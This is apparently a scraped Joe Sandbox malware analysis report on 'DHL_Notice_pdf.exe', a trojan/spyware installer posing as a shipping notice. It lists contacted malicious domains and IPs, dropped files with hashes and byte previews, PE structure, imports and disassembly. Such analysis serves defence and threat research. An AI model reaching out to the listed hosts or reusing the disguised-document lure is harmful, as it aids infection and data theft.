                                          http://www.bisarropainting.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                            		high
                                            http://www.madliainsalu.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kotelak.ruReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rifleroofers.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.denko-kosan.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.madliainsalu.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mindsetlighting.xyzReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.buymyenergy.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=146E771M.5.drfalse
                                              		high
                                              http://www.denko-kosan.comReferer:explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                		high
                                                http://www.adoptiveimmunotech.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://nsis.sf.net/NSIS_ErrorErrorDHL_Notice_pdf.exefalse
                                                  		high
                                                  http://www.creative-shield.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                    		high
                                                    http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.adoptiveimmunotech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.creative-shield.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=146E771M.5.drfalse
                                                      		high
                                                      https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                        		high
                                                        http://www.traindic.topexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.admet01.club/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.yongleproducts.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.bisarropainting.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=146E771M.5.drfalse
                                                          		high
                                                          http://www.bisarropainting.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yongleproducts.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mindsetlighting.xyzexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          198.46.160.97
                                                          		www.0dhy.xyzUnited States
                                                          		36352AS-COLOCROSSINGUStrue
                                                          67.222.24.48
                                                          		rifleroofers.comUnited States
                                                          		63410PRIVATESYSTEMSUStrue
                                                          49.212.180.95
                                                          		denko-kosan.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                          1.13.186.125
                                                          		www.yongleproducts.comChina
                                                          		13335CLOUDFLARENETUStrue
                                                          162.241.24.110
                                                          		bohndigitaltech.comUnited States
                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                          219.94.129.181
                                                          		kunimi.orgJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                          162.0.231.77
                                                          		www.traindic.topCanada
                                                          		22612NAMECHEAP-NETUStrue

                                                          General Information

                                                          Joe Sandbox Version:37.0.0 Beryl
                                                          Analysis ID:831175
                                                          Start date and time:2023-03-21 08:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 1s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:DHL_Notice_pdf.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@8/5@14/7
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 65.2% (good quality ratio 59.3%)
                                                          • Quality average: 72.2%
                                                          • Quality standard deviation: 31.8%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 209.197.3.8
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:07:18API Interceptor467x Sleep call for process: explorer.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\146E771M

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmmon32.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\bwgyj.py

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:OpenPGP Public Key
                                                          Category:dropped
                                                          Size (bytes):209991
                                                          Entropy (8bit):7.998709566109535
                                                          Encrypted:true
                                                          SSDEEP:3072:GOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0SZ:GOXQocQ+EK9TVKEYydky+XfHPpYFZG/
                                                          MD5:9203F8F38EDD3B6CEE9B5647706C4747
                                                          SHA1:9EA9A90EB73A07AC7B6710D752A1A2DCC7E0ED76
                                                          SHA-256:4B2DB80CC55681E7CD277C2DC4BD5BB67E1E4EE03F4665D214DBC9BBECCABFC8
                                                          SHA-512:0669801D821650A9AF04D35BBAEE776B2D91A09A0E4630AB7EB22C93711FE57E9FF76268953ED918CE98F8DE22AFB0C8AAEA11BDFE91CBE245743EB273C56B69
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.....7..d..ga...}7.'.G......#.,...b..... ..K.......X$.9..B..[...usn......o5..}..........l.5=C.`.{..}v.b..B.......u.w...V..v1&p...P.h!.....~.7..M......R.am..&\....P......E....t..v.?.C....7.v....Zb&o2...F8.&V...Y}Q..aI............m.`|....gR`...7.....H."@..'D..h.A).hk..hb.D... R.K3......v$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....5Y.k.?.|.:......!sv..Zb&o2......d....XQ..aI.............m.`|c...,.go`...7..d....H."@=.'D....h.A?..,...b..... ..K.......X$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....t..v.?.".......`.v.Zb&o2......d...}Q..aI.............m.`|c...,.go`...7..d....H."@=.'D....h.A?..,...b..... ..K.......X$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....t..v.?.".......`.v.Zb&o2......d...}Q..aI...

                                                          C:\Users\user\AppData\Local\Temp\nsd7F3C.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):233940
                                                          Entropy (8bit):7.852327544537286
                                                          Encrypted:false
                                                          SSDEEP:3072:2sOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0N:XOXQocQ+EK9TVKEYydky+XfHPpYFZGw
                                                          MD5:CB7BDC432B7BA8C7ED8B489D5F08A081
                                                          SHA1:A58E23586ED03EBB8B0D7670383F92C80F07D9A5
                                                          SHA-256:81E2187A7CD1186869B5F492E68CBAC1EF8B404DD893EF9AC7295093C6C8C227
                                                          SHA-512:5FD7458B503BA3AE3514236B2FFBE4AEED27E651994F8C2BDC50BFCAF8A7D1E5705CF7FFDE87A7BB144B72FFA2E52F3DF97B139610C5448BA91B75312188BFFB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:./......,........................ .............../..............................................................................7...........................................................................................................................................................G...............M...j...............................................................................................................................}...........N...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\thztifyh.t

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6099
                                                          Entropy (8bit):7.134928677733547
                                                          Encrypted:false
                                                          SSDEEP:96:Farc6oY0Wg/DrYuDk2XO5oSw09LFQiY3XdQSkwKOYJ8CJZT0v81DJi6p:FarcRTrhX1SJ9LOn3tRkwtxE1D7
                                                          MD5:0A06F95BA28B6704B7DBC7F68D1B5BE4
                                                          SHA1:F1118B8640DFB7533F744FBD8CD24780D04650CD
                                                          SHA-256:4F6DAE66BA6DC6B3EBBABD57F2A4404AF38452EC3677A779D5F41A378982B0E1
                                                          SHA-512:417FB43A079FEC2A3702EA562E51A3E5EAEFD64D753302A3BC31AE867E2C50AE8D081883D247433F6A09C71C83EF09BFFF0B38942C1A14DEA3D60435E1B50688
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                          C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5632
                                                          Entropy (8bit):4.4633891846895075
                                                          Encrypted:false
                                                          SSDEEP:96:G8wZF3bluZzQb5P4oyn/7JhpywpZ6uYHrAhBPxesU8:G8UF3bY1SP4oynl/ycZ6uYHrSBwsU8
                                                          MD5:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          SHA1:5EB04D667D4E5A5B453ED028083423FA810EA5C4
                                                          SHA-256:E05AF06D3928D4583C5B2B2C433B9189411EB48F39D5CBAAFED06F5CB27B3B20
                                                          SHA-512:F2EBA81E5E658E4FF486C796F90CE80B664DA91349181B901D9B8DE96D8DA85E40F389897F5AC94228F4073ABA6B4946A5728D08A5BAE720D1FB3A592F5B1050
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 27%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(.@.(.@.(.@.@.A.(.@.(.@.(.@K7.@.(.@ 4.@.(.@K7.@.(.@.v.A.(.@.v.A.(.@Rich.(.@........PE..L......d..................................... ....@..........................@...............................................".......................................!............................................... ...............................text............................... ..`.rdata..:.... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.905063780230514
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DHL_Notice_pdf.exe
                                                          File size:255238
                                                          MD5:771508cf2751f6dabe05758e4fa25fdf
                                                          SHA1:f6d7d33b6a340d2c370ca31a6f9677a2e5306486
                                                          SHA256:652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
                                                          SHA512:437bca115b12044ff08264218c4ab6546a345b5fe2e6ed89d09cbbaf51f77522afc4e9004cb88e229ee3b0687faf611d30a346b953bbd8eaba0a3ece7df4fdb8
                                                          SSDEEP:6144:/Ya6h4vRbB2TXukTFPqjpsaKncVt9l7GmmEE09z:/Yb4vRbB2Ldgjua2cplymmEE09z
                                                          TLSH:6944124847E4E0BFE4A246701DFA62BA5BF4B52E9475410B63C02B697E726B15F0F332
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                          File Icon

                                                          Icon Hash:b2a88c96b2ca6a72

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x403640
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:61259b55b8912888e90f516ca08dc514

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 000003F4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [ebp-14h], ebx
                                                          mov dword ptr [ebp-04h], 0040A230h
                                                          mov dword ptr [ebp-10h], ebx
                                                          call dword ptr [004080C8h]
                                                          mov esi, dword ptr [004080CCh]
                                                          lea eax, dword ptr [ebp-00000140h]
                                                          push eax
                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                          mov dword ptr [ebp-2Ch], ebx
                                                          mov dword ptr [ebp-28h], ebx
                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                          call esi
                                                          test eax, eax
                                                          jne 00007F3D28E0F87Ah
                                                          lea eax, dword ptr [ebp-00000140h]
                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                          push eax
                                                          call esi
                                                          mov ax, word ptr [ebp-0000012Ch]
                                                          mov ecx, dword ptr [ebp-00000112h]
                                                          sub ax, 00000053h
                                                          add ecx, FFFFFFD0h
                                                          neg ax
                                                          sbb eax, eax
                                                          mov byte ptr [ebp-26h], 00000004h
                                                          not eax
                                                          and eax, ecx
                                                          mov word ptr [ebp-2Ch], ax
                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                          jnc 00007F3D28E0F84Ah
                                                          and word ptr [ebp-00000132h], 0000h
                                                          mov eax, dword ptr [ebp-00000134h]
                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                          mov dword ptr [0042A318h], eax
                                                          xor eax, eax
                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                          movzx eax, ax
                                                          or eax, ecx
                                                          xor ecx, ecx
                                                          mov ch, byte ptr [ebp-2Ch]
                                                          movzx ecx, cx
                                                          shl eax, 10h
                                                          or eax, ecx

                                                          Rich Headers

                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x3b0000xcd00xe00False0.421875data4.212531507733574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                          RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                          RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                          RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                          RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                          RT_VERSION0x3b7580x234dataEnglishUnited States
                                                          RT_MANIFEST0x3b9900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.38.8.8.851139532023883 03/21/23-08:08:13.337564UDP2023883ET DNS Query to a *.top domain - Likely Hostile5113953192.168.2.38.8.8.8

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
